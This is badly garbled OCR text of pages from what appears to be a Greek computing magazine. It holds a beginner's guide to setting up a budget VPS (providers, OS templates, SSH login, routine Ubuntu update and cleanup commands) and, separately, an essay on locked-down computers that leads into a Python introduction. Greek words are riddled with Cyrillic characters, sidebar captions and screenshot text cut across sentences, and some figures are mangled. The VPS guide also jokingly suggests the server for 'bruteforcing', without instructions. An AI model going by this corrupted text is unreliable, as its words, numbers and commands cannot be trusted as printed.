bandwidth µε μόλις 635,88 το χρόνο. Па εμὰς που δεν τα πάμε кала µε 
το συνάλλαγμα, αυτὀ μεταφράζεται σε μόλις 27,246, για Evav ολόκληρο 
χρόνο2! (Σ.τ.Ε. Хриф, καλὰ εἶναι, алла it ain't Linode :D) 


Μία ακόµα εταιρεία στην οποία ἡμουν πελάτης στον παρελθὀν εἶναι η 


1. Κάτι σαν swap, αλλά αρκετά πιο Περίπλοκο. 
2. Αντίστοιχη, απλἠ εταιρεία web hosting θα ἠθελε περίπου 506 για Eva χρόνο. 


Εμείς προτιμάμε 
την πλατφόρμα Tou 
OpenVZ, για Tov 
host server oTov 
οποίο θα βρίσκεται 
ο δικός µας VPS. 
Εδώ που τα λέμε, 
βέβαια, δεν θα 
ἀλλαζε τίποτα στην 
περίπτωση του 
Xen ἡ του KVM. 

Οι διαφορές εἰναι 
πολύ μικρὲς και 
εἶναι αδύνατο για 
έναν πρωτάρη να 
τις εντοπίσει. 


YV HAQKER 
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BuyVM (http://buyvm.net). O Francisco, о ἄνθρωπος пісо апо αυτή τη 
µικρή εταιρεία, τρέχει ο ἴδιος σε datacenter, ρυθμίζει τους server тои апо 
коута, ἐχει δικἠ του διανομή Linux για τους πελάτες και, µε àiya λόγια, 
EXE] μεράκι. Н δουλειά του εἶναι ιδιαἰτερα προσεγμένη και Οἱ Server του 
δεν εἶναι παραφορτωμένοι µε πελάτες. Οἱ τιμὲς της BuyVM εἶναι ακόµη 
καλύτερες апо αυτὲς της QuickWeb. Με μόλις $3.50 το µήνα рпорєі va 
κάνεις ӧікӧ σου vav VPS µε 256MB RAM και burst στα 512MB, 30GB 


Εδώ βλέπουμε χώρου και 1ΤΒ bandwidth. 

ος Στην περἰπτωση που δεν βρει κανεὶς καλὲς просфорес στα Low End Box 
QuickWeb. Μέσα και Web Hosting Talk, αξίζει va ρίξει µια ματιά στις δύο παραπάνω εται- 
απὀ το panel µπο- ρεἰες. Βέβαια, πρέπει να τονίσουμε ὁτι η αναφορά σε αυτέςτις δύο έγινε 
ройр να ελέγξου- µε βάση την προσωπικἠ εμπειρία του γράφοντα και γίνεται µε κάθε επι- 
µε πλήρως το νεο φύλαξη! 

μας VPS! 


QuickWeb VPS Manag: 


34f4x284n284d403h5s2 


Home | My Account | Help Desk | Announcement | Logout 


okazaki.giannoug.gr (80.83.121.244) 


Status Online Hostname okazaki.giannoug.gr 
IP Address 80.83.121.244 Operating System Ubuntu 10.10 (32-bit) 
IPv4 Address 1 IPv6 Address 0 
Node Mobelwagen Bandwidth 250 GB 
Disk Space 10 GB Memory 256 MB 


Virtualization Туре Á (OpenVz) Burst 384 MB 


Bandwidth Usage 1 1% 2.47 СВ of 250 СВ Used / 247.53 GB Free 


Memory Usage (Ie) 237.53 MB of 384 MB Used / 146.47 MB Free 


Disk Usage ШЕ = 3.69 GB of 10 GB Used / 6.31 GB Free 


Controls 


General Root Password | Console Password | Network | API | Statistics | 
ЕСПЕ Shutdown ЕП kenst 


VPS Manager © 2008-2012 QuickWeb Hosting Solutions 


Τα βασικά 


Όπως εἶπαμε προηγουμένως, то VPS αποτελεἰ Eva εἶδος virtual machine 
και ката την αγορά του µας δίνεται Eva username κι va password. Με 
αυτά μπορούμε να συνδεθούμε σε ειδικἠ εφαρµογἡ Tou host server, ano 
ὀπου μπορούμε να κλείσουμε то VPS, να то ανοίξουμε, уа το επανεκκινἠ- 
σουµε, уа εγκαταστήσουµε κάποιο λειτουργικό και πολλά алла. Μοιάζει 
αρκετά µε το περιβάλλον διαχείρισης των VMWare και VirtualBox, οπὀτε 
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уу ССС ССС СЕСК ССС 


οποιαδήποτε εμπειρία апо αυτὲς τις εφαρμογές Ва σας βοηθήσει πολύ. 
Επίσης, ανάλογα µε την εταιρεία και το πακέτο, προσφέρεται ενίοτε και η 
δυνατότητα να κρατήσουμε snapshot Tou server! 


Όταν μιλάμε για εγκατάσταση λειτουργικού σε ἑνα ΝΡ5, µη φαντάζεστε 
ὁτι μπορούμε уа εγκαταστήσουµε οτιδήποτε θέλουμε, ὁπως σε Eva κλασ- 
σικὀ virtual machine. Κάθε εταιρεία διαθέτει μερικά προ-εγκατεστηµένα 
λειτουργικἀ συστήματα, γνωστὰ και ως templates, που µπορεί κανεἰς να 
φορέσει στο VPS του’. Σε αυτά συγκαταλέγονται συνήθως то Debian, 
το Ubuntu, το CentOS, το Arch Linux, To Fedora алла και διάφορες ἁλ- 
λες, λιγότερο διαδεδομένες διανομές, ὁπως то Scientific Linux. Με ἄλλα 
λόγια, το λειτουργικὀ που μπορούμε уа εγκαταστήσουµε ото VPS µας 
εξαρτάται ano τα διαθέσιµα templates και κατ’ επέκταση апо τον εκά- 
στοτε πάροχο. Αρκετές εταιρείες μπορούν να προσθέσουν στα template 
σχεδὀν οποιαδήποτε διανομὴ ζητήσει ο πελάτης και η σχετικἠ διαδικασία 
ολοκληρώνεται εντὸς λίγων ωρών. 


Το λειτουργικὀ 


Отау σκέφτεται κάποιος ποια διανομὴ εἶναι καταλληλότερη για Eva 
server, το μυαλὸ του πάει αµέσως στο Debian ἡ και στο CentOS. Πολύ 
καλὲς επιλογὲς και οι δύο, µια που μιλάμε για αρκετά отаберес και δοκι- 
μασμένες διανομἑὲς. Εμάς όμως δεν µας ενδιαφἑρουν. O бікдс µας server 
θέλουμε να κάνει βασικὲς δουλειὲς και κυρίως να σερβίρει απλά μερικὲς 
σελίδες. Επομένως, μπορούμε κάλλιστα να βάλουμε το δημοφιλὲς και 
εὐχρηστο Ubuntu -- ἡ τέλος πάντων ὀποια ἄλλη διανομή θέλουμε. Στο 
Ubuntu πάντως προσφέρονται! πολλὲς ευκολίες, που το καθιστούν ιδανι- 
KÓ για τους αρχάριους. 


Fedora14-i386 (32-bit) 
Fedora 14 - 32 bit template 


Gentoo 2008 -11.27 (64-bit) 
Gentoo 2008 -11.27 (64-bit) ** warning: Out-dated template use at own risk. 


y 


+ 
“ 
” 


Gentoo 2008 -11.30 (32-bit) 
Gentoo 2008.0 - 11.30 (32-bit) ** Warning: Out-dated template use at own risk. 


OpenSUSE 11.1 (32-bit) 
OpenSUSE 11.1 (32-bit) 


z 
H 
% 


>» Ç 


OpenSUSE 11.1 64-bit 
OpenSUSE 11.1 64-bit 


Slackware 13 (32-bit) 
Slackware 13 (32-bit) - Minimal 


Ubuntu 10.04 (32-bit) 
Ubuntu 10.04 32-bit OS template (minimal) 


Ubuntu 10.04 (64-bit) 
Ubuntu 10.04 (64-bit) 


Ubuntu 10.04 - LAMP (32-bit) 
Ubuntu 10.04 - LAMP (32-bit) 


(979491545 


Па παράδειγµα, τα πακέτα της PHP και Tou lighttpd συνεργάζονται άψογα 
και αμέσως. Στο παρελθὀν, ο lighttpd στο Debian χρειαζόταν ειδικἠ χει- 
ροκίνητη ρύθμιση για να σερβίρει σωστά σελἰδες µε PHP. Αντίθετα, στο 
Ubuntu ο lighttpd ερχόταν ἑτοιμος να σερβίρει σελίδες σε PHP. Πλέον 
ἐχουν αλλάξει κἀποια πράγματα, αλλά шкрес λεπτομέρειες σαν αυτὲς 
κάνουν το Ubuntu το τέλειο λειτουργικὸ για αρχάριους και για αυτούς 


3. Ма αντιγραφή Tou προ-εγκατεστηµένου root filesystem εἶναι, στην ουσία. 


Н λίστα µε та δια- 
θἐσιµα λειτουργικἁ 
που προσφέρει η 
QuickWeb. Πάρα 
πολλές επιλογές 
και πάρα πολ- 

AEG διαθέσιμες 
εκδόσεις, για κάθε 
γούστο! 


YV HAQKER 
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που бе θέλουν уа µπλέκουν τόσο 
πολύ HE TIG ρυθμίσεις”. 


Basic options for your PuTTY session Λειτουργικὀ για To VPS επιλέγουμε 
Specify the destination you want to connect to ката την αγορά του, алла μπορού- 
Host Name (or IP address) Port µε ауа паса στιγµἠ να то αλλάξου- 
(808312124 | με. Όπως εἰπαμε προηγουμένως, 
Connection type: αυτό γίνεται ano To control panel 
ΕΕ (Oise οσο εν Tou host server. 


- Appearance 
- Behaviour š Ө А 
. Translation Saved Sessions П рота B йната 


Load. save or delete а stored session 


Default Settings Αφού επιλέξουμε кі εγκαταστήσου- 
µε το λειτουργικὀ, έρχεται η ора 
να συνδεθούμε στο VEO µας EIKO- 
уікд server! Φυσικά, η σύνδεση θα 
γίνει µέσω SSH. Па To λὀγο αυτό, 
στα Windows θα χρειαστούμε Kå- 
Close window on ext: = ) ποιο прбүранна σαν то PuTTY. Апо 
Әлен ала са кушы то Linux, η σύνδεση γίνεται поло 
πιο εὐκολα, µε το προγραμματάκι 
ssh της γραμμὴς εντολών. 


| | Па να συνδεθούμε στον server 
Αφού κατεβήσουµε μας, θα χρειαστεἰ να γνωρίζουμε τη διεύθυνση ІР του. Αφού γίνει η σὐν- 


To PuTTY, το μόνο Р ͵ , . ñ , 
ποῦ-χρειάζεται δεση, θα δώσουμε то ὀνομα χρήστη (σχεδὀν πάντα πρὀκειται για Tov 


να κάνουμε εἶναι root) και στη συνέχεια τον αντίστοιχο κωδικὀ. Όλα τα παραπάνω avaypa- 
να εισαγάγουµε φονται σε email που λαμβάνουμε αυτόματα όταν αγοράζουμε то VPS, апо 
τη διεύθυνση του την εταιρἰα που κἀνει To hosting. 

νέου µας server 

και στη συνέχεια Αν ἐχουν γίνει όλα σωστά, ο νέος µας server θα µας υποδεχτεί. Μπορού- 
уа πατήσουµε στο НЕ πλέον να του αλλάξουμε τα фота, ὁπως θα κάναμε σε οποιοδήποτε 
Open... μηχάνημα Linux nou θα έπεφτε στα χέρια µας ;) Па αρχή, πάντως, κι 


εφόσον έχουμε επιλέξει το Ubuntu, кало θα тау να πραγματοποιήσουμε 
ορισμένες απλὲς ρυθμίσεις. 


Αρχικἠ ρύθμιση 


Καταρχάς, υποθέτουμε бт! ἐχουμε εγκαταστήσει στο VPS το Ubuntu 
11.10. Στις περισσότερες περιπτώσεις, αν ὀχι σε ὁλες, το template του 
λειτουργικού θα εἶναι αρκετἀ πίσω και θα του λείπουν πολλὲς ενημερώ- 
σεις. Па αρχή, λοιπὸν, кало θα ἦταν να ξεκινήσουμε µε µια αναβάθμιση 
του συστήματος. Αρκεἰ να δώσουμε κάτι τέτοιο: 


apt-get update 


Με την εντολή auth θα αναβαθμιστούν οι λίστες µε τις εκδόσεις των 
διαθέσιμων εφαρμογών/προγραμμάτων/εργαλείων. Ωστόσο, τίποτε ἠδη 
εγκατεστημένο δεν θ’ αναβαθμιστεί. Па va то πετύχουμε ауто, θα πρέπει 
уа εκτελέσουµε το ακόλουθο: 


apt-get dist-upgrade 


H διάρκεια αυτἠς της διαδικασίας εξαρτάται ano το πόσες αναβαθμίσεις 
ἐλειπαν ano το template. Σε λίγα λεπτά πάντως ο server µας θα εἰναι 
ολόφρεσκος και πανέἑτοιµος για (νέες) περιπέτειες. Παρεμπιπτόντως, 
µετά την αναβάθµιση του συστήµατος, кало θα тау να επισκεφτούμε TO 


4. Δεν µπορεί κάποιος αρχάριος να ξέρει πόσα PHP processes χρειάζονται σε ¿vav шкрб VPS, σωστά; 
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control panel του host server και να κάνουμε µια επανεκκίνηση στο VPS. 
Όχι γιατὶ απαιτείται, алла κυρἰως γιατὶ μπορούμε 2) 

Σειρἁ Exel η ора. O host server ενδέχεται να βρίσκεται στη Γερμανία, 
στη Νέα Υόρκη ἡ κάπου πολύ πιο μακριά. Σε κάθε περίπτωση εμάς θα µας 
βόλευε να ἐχει τη δικἠ µας ора, WOTE να έχουμε καλύτερο ἐλεγχο. Πα то 
σκοπὀ αυτό, арке! va τρἐξουµε το παρακάτω: 

dpkg-reconfigure tzdata 

Ano το μενού που θα εμφανιστεἰ επιλέγουμε αρχικἁ Ευρώπη και στην 
συνέχεια Αθήνα. Αυτό ἦταν. Έχοντας δηλώσει τη δικἠ µας ζώνη орас о 
server θα εἶναι συντονισμένος στην ора Ελλάδος! 


Configuring tzdata 


2To login prompt 
δίνουμε TO ὀνομα 


χρήστη και τον KW- 
δικό, όπως αναγρό- 


φονται στο email 
που µας ἐστειλε η 
εταιρία ката την 
αγορά Tou VPS. 


Please select the city or region corresponding to your time zone. 


Time zone: 


Amsterdam 
Andorra 


Belfast 
Belgrade 
Berlin 
Bratislava 
Brussels 
Bucharest 
Budapest 


WEBEL MAL MRL MEL BEL 


A 
Ὠ 
В 
а 
m 
= 
М 


Τα template των εταιριών εἶναι σπανίως καθαρὰ. Поло συχνὰ περιλαμβά- 
vouv аркетес προ-εγκατεστημένες εφαρμογές, οι οποίες ενδέχεται να µη 
μας χρειαστούν потё. Αν βέβαια προκύψει κάποτε η ανάγκη, μπορούμε 
апла να τις εγκαταστήσουμε. Мерікес κλασσικὲς εφαρμογές που ανἠ- 
κουν σ΄ αυτἠ την κατηγορἰα εἶναι ο Apache web server καὶ η MySQL. Eav 
θέλουμε να τις απομακρύνουμε οριστικἀ, δεν έχουμε пара να δώσουμε 
κάτι τέτοιο: 


apt-get remove --purge apache* mysql* 


Θέλουμε o server 
μας va ἐχει τη δική 
µας opa. Ακριβώς 
yl’ αυτό, πρέπει va 
επιλέξουμε το δικό 
нас timezone. 
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To htop δείχνει H παράμετρος --purge, δίπλα ото remove, θα ἐχει σαν αποτέλεσµα την 


τη λίστα µε τις απεγκατάσταση των εφαρμογών αλλά *ка!* τη διαγραφἠἡ ὁλων των na- 
διεργασίες που ρελκόμενων αρχείων (αρχεία ρυθμίσεων, documentation κ.ἀ.). Αφού 
τρέχουν στον νέο καθαρἰσουµε το σύστημα απὀ τις ανεπιθύμητες εφαρμογές, μπορούμε 
μας server. Εδώ να εγκαταστήσουμµε εκείνες που χρειαζόμαστε. Πα παράδειγµα, с’ εμάς 


φαίνεται От! τρέχει . . I I ht поё 
ὄχι μόνο о lighttpd, Ὡρέσει o process viewer που ακούει ото буора htop. Πρόκειται για ша 


алла και η MySQL ὀμορφη кі ιδιαίτερα εὐχρηστη παραλλαγή του γνωστού top. Па va то 
μαζί µε την PHP! H εγκαταστήσουμµε δίνουμε αυτό: 
φωτογρφία, BAE- 


πετε, προέρχεται apt-get install htop 

ano ἐναν προσωπι- 

кд µας VPS, στον Αυτά για την ора... 

οποίο φιλοξενείται 

ένα ωραιότατο Πλέον, ο δικὸς µας VPS εἶναι ἑτοιμος να µας στηρἰξει σε κάθε VEO µας 
blog ;) gyxgipnua. Εἶναι και πεντακάθαρος, χωρὶς να σπαταλά іхуос πόρων σε 


άχρηστες λειτουργίες. Πα την ора βέβαια δεν κάνει τίποτα χρήσιμο, 
αλλά αυτό εἶναι στο χέρι µας να αλλάξει! Παρεμπιπτόντως, av δεν το 
έχετε συνειδητοποιήσει ακόµα, μιλάμε για Evav server που συνδέεται 
στο Internet µε µια γραμμή των 100mbit (τουλάχιστον!) και εἶναι еуерүдс 
24/7. Επομένως, αποτελεἰ την ιδανικἠ πλατφόρμα για πολύωρες εργασἰες 
ὁπως, εχμ, ας πούμε то bruteforcing. Στο επόμενο ἆρθρο θα δεἰξουµε 
την εγκατάσταση ενὸς web server, της PHP και της MySQL. Επἰσης, θα 
ασχοληθούμε και µε την ασφάλεια του συστήματος, για να κρατήσουμε 
απέξω του περἰεργους. Па την ора μπορούμε να πειραματιστούμµε και να 
κατανοήσουμε καλύτερα πως δουλεύουν οι VPS, ὁπως επἰσης να παἰξου- 
µε και να γνωρίσουμε καλύτερα To control panel του host server. Όλα 
αυτά βέβαια Хафо0% εντοπἰσουµε την καλύτερη προσφορὰ. Θέλουμε να 
πιστεύουμε ὁτι οι κατευθυντήριες που σας δώσαμε εἶναι καλὲς και χρἠ- 
σιμες. 
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Beta but... stable. 


Monthly or so, web show qbout 
technology, pc, linux and much more! 


More info: 
www.thebetashow.gr 


@TheBetaShowGR 
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Κάτι pou λέει бт! οι περισσότεροι апо сас γεννηθήκατε -- ἑστω χρησι- 
μοποιήσατε υπολογιστή για πρώτη фора-- σε µια εποχἠ που o! биуато- 
τητες των μηχανημάτων ἠταν Non αυξημένες. Με ἄλλα λόγια, θεωρείτε 
φυσιολογικὀ για τον υπολογιστή σας να παϊζει video, να κατεβάζει ταινίες 
και µουσικἠ апо To Internet µε μεγάλη ταχύτητα και να τρέχει τα τελευ- 
taia 3D παιχνίδια (αφήνω ката µέρος τους εκβιασμούς στους γονεὶς σας, 
για να σας πάρουν την τελευταία, πανάκριβη карта γραφικών :) Θεωρείτε 
δεδομένο ὁτι ο υπολογιστής εἰναι кат! που χειριζόµαστε µε το ποντίκι 
και οι νεώτεροι апо σας δεν xouv δει NOTE οθὀνη µε καθοδικὀ σωλήνα 
(εκτὸς ἰσως ano κανένα εργαστήριο σχολείου). Αν δεν υπήρχε δε και το 
περιοδικὀ που κρατάτε στα χέρια σας, πολλοὶ апо εσάς ενδέχεται να µην 
µπαἰνατε ποτέ στον Kono ν΄ ασχοληθεἰτε µε τη γραμμή εντολών ñ p’ όλα 
αυτά τα περἰεργα λειτουργικἀ, που θέλουν τόσο KONO να εγκατασταθούν 
και τόσες πολλὲς χειροκίνητες ρυθμίσεις... 


Όταν αφήνετε όλα αυτά, γυρἰζετε στην «ασφάλεια» και τη θαλπωρή των 
Windows που γνωρίζετε --το прото λειτουργικὀ που εἰδατε και που рал- 
λον νομἰζατε бт! ἦταν και то µοναδικὀ. Υπάρχουν βέβαια στιγμὲς που σας 
εκνευρίζει: Κολλάει ιούς, κρασάρει, καθυστερεί και μόνη λύση εἶναι να To 
ταῖζετε συνεχώς µε περισσότερο hardware: γρηγορότερους δίσκους και 
επεξεργαστές, περισσότερη RAM, ακριβὀτερες κάρτες γραφικών και πάει 
λέγοντας. Πάλι, όμως, όταν σκέφτεστε τι σας προσφέρει δεν ЕХЕТЕ να 
παραπονεθείτε: Κάνει όλα αυτά που θέλετε και μπορείτε να βρίσκετε TOU- 
λάχιστον Eva проүраџџа για καθετὶ που περνάει απὸ το μυαλὸ σας. AKÒ- 
μα κι αν ἐχετε εγκαταλείψει τα Windows και χρησιµοποιείτε κἀποιο ἆλλο 
λειτουργικὀ, εἶναι αρκετά πιθανό та ἐτοιμα προγράµµατα που ἐρχονται p’ 
αυτὀ (ñ που µπορείτε να εγκαταστήσετε εὐκολα) να καλύπτουν тіс περισ- 
σότερες απαιτήσεις σας. Ναι, ο υπολογιστής εἶναι Eva κουτί που µπορεί να 
κάνει το καθετἰ, біуоутас του βεβαίως το κατάλληλο πρὀγραμμα. Εσείς, 
ano τη μεριὰ σας, εἶστε ікауоі να εντοπἱζετε οποιοδήποτε πρὀγραμμα 
χρειαζόσαστε κἆθε фора και να το εγκαθιστάτε επιτυχώς. ‘ETO! δεν εἶναι; 


Ε, ὀχι, δεν εἶναι! 


Δεν ξέρω αν το ἐχετε καταλάβει, αλλά όλος ο κόσμος εἶναι γεμάτος υπο- 
λογιστὲς -- και δεν εννοώ та PC. То κινητὀ σας τηλέφωνο εἶναι ¿vag 
υπολογιστής. H τηλεόραση σας ἐχει µέσα ¿vav υπολογιστή. То ἴδιο και т” 
αυτοκίνητα και οι φούρνοι μικροκυμάτων. Θα µου πείτε, δεν μπορώ уа 
τρέξω то LibreOffice στο φούρνο μικροκυμάτων! (αν κι күш ευχαρίστως 
θα το ἐψηνα εκεἰ μέσα). Πράγματι, δεν μπορείτε να τρέξετε τίποτα σε 
αυτούς τους υπολογιστές. AUTO όμως συμβαίνει γιατὶ ἐχουν φτιαχτεὶ και 
προγραμματιστεὶ για µια συγκεκριμένη εργασία και μόνο! Πρόκειται για 
τους λεγόμενους υπολογιστὲς τύπου *special* purpose. Πράγματι, θα 
εἶχε ελάχιστο ενδιαφἐρον να φτιάξουμε Eva φούρνο μικροκυμάτων που 
να ψήνει και αρχεία JPEG. Δεν ξέρω ὁμως αν ἐχετε παρατηρήσει τι oup- 
βαΐνει στο χώρο των υπολογιστών *general* purpose: Έχουμε γεμίσει 
OUOKEUEG που ενώ εἶναι πλήρεις υπολογιστές, ἐχουν δεκάδες τεχνητούς 
περιορισμούς! Το iPad 2 που βρἰσκεται δίπλα µου δεν μπορεἰ να τρέξει 
τίποτα που δεν ἐχει ελεγχθεί апо την Apple και δεν έχει περάσει апо то 
AppStore. То Android κινητό χρειάζεται jailbreak για va επἐµβετε σε πιο 
εσωτερικὲς ρυθμίσεις. H μανία των χρηστῶν να χρησιμοποιούν μόνο ἐτοι- 
μα πράγματα, σε συνδυασμὀὸ µε τα προβλήματα που δημιουργεί για στις 
εταιρεἰες η ελευθερία, οδήγησαν с’ Eva уёо εἶδος υπολογιστή: Τον «τε- 
Хуцта περιορισμένο» υπολογιστή γενικὴς χρήσης. Και λέμε «τεχνητά», 
γιατί ἑνας υπολογιστής γενικἠς χρήσης --τουλάχιστον апо «τη φύση» 


Programming is fun: games in Puthon! 
УМ “УУУХУХУХУХУҚ УУҰУУХ%»Ұ Ҡ( уу, Т 7ә”//2/4и”Уу?э/ и 


του-- τρέἐχει και κάνει τα πάντα. "Еуас υπολογιστής αυτού του εἰδους, 
στον οποίο ἐχουν επιβληθεί τεχνητοὶ περιορισμοί, θυμίζει Eva φούρνο 
μικροκυμάτων που αρνείται να ψήσει οτιδήποτε ἆλλο εκτὸς апо κοτόπου- 
Ло! Καλό για τη δίαιτα µας, αλλά σήμερα θέλω να φάω μµπιφτέκια! 


Δυστυχώς, οι υπολογιστές μοιάζουν να βαδίζουν προς τα εκεἰ κι AUTÒ 
δεν αποτελεἰ μόνο προσωπικἠ µου εκτίμηση. Μπορεἰτε να δείτε και την 
ομιλία του Cory Doctorow, στο Chaos Communication Congress. O τίτλος 
της εἶναι «Тһе coming war on general computation» και μπορεἰτε να τη 
βρείτε ото YouTube: 


http://bit.ly/warOnGenComp 


In the Beginning... 


Όχι. Τα праүната беу ñTav πάντοτε ἐτσι. To РС, στη µορφἠ που то yvw- 
рібете σήμερα, δεν υπήρχε τη δεκαετία Tou 80. Па уа το θἐσουµε δια- 
Φορετικἀ, av και то ІВМ PC κατασκευάστηκε τότε, απευθυνόταν μόνο 
σε επιχειρήσεις και фиска η τιµή του ἦταν απλησίἰαστη για τους απλούς 
θνητούς. Ἠταν Eva ιδιαίτερα βαρετὀ μηχάνημα, χωρἰς ἦχο, µε donpopau- 
pn, πράσινη ἡ портокалі (!) οθόνη και εἶχε τόσο ενδιαφέρον 000 ¿va ντο- 
κιμαντὲρ που το βλέπετε σε εκατοστἠ επανάληψη, στις πέντε το πρωΐ. 
Βέβαια, το μηχάνημα екеіуо δεν εἰχε τους τεχνητούς περιορισμούς που 
επιβάλλονται σήµερα στους υπολογιστές. AVAPWTIEOTE τι χρησιμοποιού- 
сан εμεὶς, που ξεκινήσαμε ν΄’ ασχολούμαστε µε τους υπολογιστὲς то 80; 
Υπήρχε ша ολόκληρη γενιὰ μηχανημάτων, µε та οποία μεγάλωσαν πολλοὶ 
προγραμματιστὲς, των οποίων τα προγράμματα χρησιμοποιείτε ακόµη και 


Texas 
Instruments 
99/4A. Γνωστό ως 
ТІ-99/4А. Ау δεν 
εἶχα τόσους servers 
ενεργούς 24/7, 
πιστεύω OTI αυτό 
(το πρώτο µου) 
μηχάνημα θα εἶχε 
ρεκὀρ uptime. Ναι, 
λειτουργεί ακόµα. 
[http://bit.ly/ 
ti994aPresentation] 
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σήμερα. Мпоркїтє να δείτε µερικἀ τέτοια μηχανήματα στις εικὀνες του 
ἄρθρου αλλά και στο шкрд, προσωπικό µου ...μουσείἰο: 


http://museum.freebsdgr.org 


Μπορείτε να φανταστείτε ποιο ἦταν то κοινὀ χαρακτηριστικὀ εκείνων των 
μηχανημάτων; Μα Φφυσικἀ, το µοναδικὀ τους ενσωματωμένο πρὀγραμ- 
на: Μια γλὠσσα προγραμματισμού! Στο 99% των περιπτώσεων ἠταν µια 
διάλεκτος της γνωστἠς BASIC. Αυτό που ἐκαναν όλη μέρα οι χομπίστες 
της εποχής, ἦταν να γράφουν προγράμματα: Та біка τους, апо βιβλία ñ 
κι ano περιοδικἀ! O προγραμματισμός, βλέπετε, εἶναι εθιστικὸς. Ікауо- 
ποιεἰ τη δημιουργικὀτητἁ µας και επιβεβαιώνει τον ἐλεγχό µας πάνω στη 
μηχανή. Ειδικἁ το τελευταίο, ἐχει εγκαταλειφθεὶ апо τους περισσότερους 
(εκτὸς ау γράψατε πρὀσφατα кауа πρὀγραμμα για Windows) και οι εται- 
рғікс προσπαθούν ούτως ἡ ἄλλων να το απαγορεύσουν (το iPad δίπλα 
µου µε στραβοκοιτἆει -- µε την µπροστινἠ κάμερα). 


Пат! δεν μαθαίνει προγραμματισμό η νέα γενιά; 
Οι λόγοι εἶναι пара πολλοί. Στα γρήγορα θα αναφἑρουµε λίγους µόνο: 
е Τα ріске! όλα ἑτοιμα. 


е Н πληροφορική ἐχειταυτιστεἰ HE тп διδασκαλἰα προγραμμάτων σαν 
το Word και το Excel. 


е Ηλογικήτης γρήγορης διασκέδασης (βλέπε παιχνἰδια στο Facebook, 
κουβεντούλα στο twitter και πάει λέγοντας) εἶναι κυρίαρχη. 


е Τα σχολικἀ μαθήματα, ὅπως η «Ανάπτυξη Εφαρμογών σε Προγραμ- 
ματιστικὀ Περιβάλλον» εἶναι ακαταλαβίστικα, ενώ η ψευδογλὠσσα 
τους аудптп και βαρετή! 


Пат! οι παλιοἰ μάθαιναν; 
е Δεν υπήρχε τίποτα ἑτοιμο. 
ο Όποιος αγόραζε υπολογιστή εἶχε σκοπὀ να μάθει προγραμματισμὀ. 


е H Microsoft ἦταν ¿va μαγαζάκι σαν το εφηµεριδοπωλείο της γωνίας 
κι η «επεξεργασία κειμένου» γινόταν σε γραφομηχανὲς. 


e To Internet ἦταν кала κρυμμένο ота ὀνειρα των BSDNdwv, που 
σχεδίαζαν το TCP/IP. 


Ὀλοι εμεἰς που μαθαΐναμε προγραμματισμὀ, το κάναμε γράφοντας ενδι- 
афероута προγράμματα: Με ҳо, γραφικά και κἰνηση. Φτιάχναμε παιχνἰ- 
δια! O προγραμματισμὀς δεν χρειάζεται, οὐτε πρέπει να βαρετὀς. >iyou- 
ρα, η αλγοριθµικἠ που κάνετε στο ΑΕΠΠ ñ στον αντίστοιχο Δομημένο 
Προγραμματισμό των ΕΠΑΛ εἶναι απαραἰτητη. Αυτό όμως δεν σημαίνει От! 
όλα τα προγράµµατα πρέπει να υπολογἰζουν χρεώσεις σε λογαριασμούς 
AEH και αδιάφορα αθροἰσµατα «μέχρι να δώσετε το μηδὲν». Έλεος, πια! 
O προγραμματισμὀς ἐχει ρουτίνες, αλλά ποτὲ δεν πρέπει να καταντὰάει 
ρουτίνα. П’ ауто λοιπὸν, αναφωνούμε: Game programming FTW! 


Welcome to Python 


Εντάξει! Νομίζουµε OT! πειστήκατε. Θα δώσετε στον προγραμματισμό 
ακόµα µια ευκαιρία. Аркеі να µην ἐχει προγράμματα που θα αθροΐζουν 
τιμολόγια, δηλαδή. Βέβαια δεν γίνεται να ξεκινήσουμε апо το μηδέν και 
να γράψουμε υπἐρ-προγράμματα. Σας υποσχόμαστε, ὁμως, OT! θα npo- 
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σπαθήσουμµε να πιάσουµε то στὀχο µας γρήγορα και HE боо το δυνατὸν 
то ενδιαφέροντα προγράμματα! Το ὀχημά µας σε αυτή την αναζήτηση 
θα εἶναι η γλὠσσα Python. Την επιλέξαμε επειδἠ µας αρέσει алла και για 
αρκετούς ακόµα λὀγους: 
ο Εἶναι κατάλληλη για εκμάθηση, σαν πρώτη γλὠσσα προγραμµατι- 
оноо. 
e Εἶναι πολὺ ισχυρή: παρέχει τόσες ἑτοιμες βιβλιοθήκες (modules) 
που µας επιτρέπει να κάνουμε τα πάντα! 
ο Τρέχει σε οποιοδήποτε μηχάνημα μπορείτε να φανταστείτε. Ναι, 
ακόµα και στο iPad, αλλά και στο PC µε Windows, Мас OS X, Linux 
ἡ BSD. 


ο Παρέχει εκείνη την ὀμορφη αμεσότητα της BASIC των 805! 


Εγκατάσταση 


Αν χρησιμοποιείτε Mac OS X, Linux ἡ FreeBSD, εἶναι πολύ πιθανὀ να την 
έχετε NON εγκατεστημένη. Av ὀχι, εγκαταστήστε την Python 2.7 and το 
repository της διανομἠς σας. Πα παράδειγµα, αν ἐχετε κάποια διανοµἠ 
βασισμένη στο Debian, θα χρειαστεί να γράψετε κάτι τέτοιο: 


# apt-get install python2.7 

Στο FreeBSD μπορείτε να κάνετε εγκατάσταση апо TO OXETIKO port: 
# са /usr/ports/lang/python27 
# make install clean 


Στα Windows, κατεβάστε την ano Tn σελἰδα www.python.org/download/ 
releases. Κατεβάστε και εγκαταστήστε την τελευταία ἐκδοση της σειρἁς 
2.7, για συμβατότητα µε ὁσα θα φτιάχνουμε στα ἆρθρα µας. 


Sinclair ΖΧ 
Spectrum, ΤΟ 
γνωστό μηχάνημα 
µε та πλήκτρα- 
γομολάστιχες! 
Πολύ γνωστό, 
καθώς ήταν ка! σε 
προσιτή τιμή. 
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Τα прота πειράµατα 


H Python ἐρχεται µε Eva περιβάλλον άμεσης εκτέλεσης εντολών, που 
ονομάζεται IDLE. Mnopeite уа το ξεκινήσετε δίνοντας idle στη γραμμή 
εντολών ἡ επιλέγοντας то απὀ το μενού του συστήματος. Πάντως, акд- 
на και χωρίς το IDLE, µπορείτε να εκτελέσετε την python χωρίς καμία 
παράμετρο: 

$ python 
Με αυτὀν τον τρὀπο n Python θα ξεκινήσει σε κατάσταση άμεσης εκτὲ- 
λεσης εντολών. Με ἀλλα λὀγια, θα εκτελεἰ Eni τόπου καθετἰ που γράφετε 
κι εφόσον πατήσετε το [ENTER]. Πα να βγείτε and το περιβάλλον, αρκεἰ 
να δώσετε Eva exit(). Σε κάθε περίπτωση, ξεκινώντας θα Seite каті σαν 
το παρακάτω: 

Python 2.7.2 (default, Jun 12 2611, 14:24:46) 

Type "copyright", "credits" or "license()" for more information. 

>> 
